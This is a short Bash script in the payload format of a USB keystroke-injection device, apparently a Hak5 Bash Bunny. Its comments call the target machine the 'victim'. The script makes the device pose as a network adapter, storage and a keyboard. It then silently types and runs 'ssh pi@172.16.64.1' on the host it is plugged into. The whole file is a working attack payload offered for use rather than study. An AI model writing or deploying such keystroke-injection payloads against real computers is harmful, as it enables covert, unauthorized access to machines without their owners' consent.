#!/bin/bash

# Maintainance Mode
# Setup: rndis and hid
# Stage1: connect victim to ssh server

LED SETUP
ATTACKMODE RNDIS_ETHERNET STORAGE HID
keyboardLayout="DE"
export keyboardLayout
LED STAGE1
QUACK DELAY 2000
QUACK STRING "ssh pi@172.16.64.1"
QUACK ENTER
LED FINISH
QUACK DELAY 1000
LED OFF
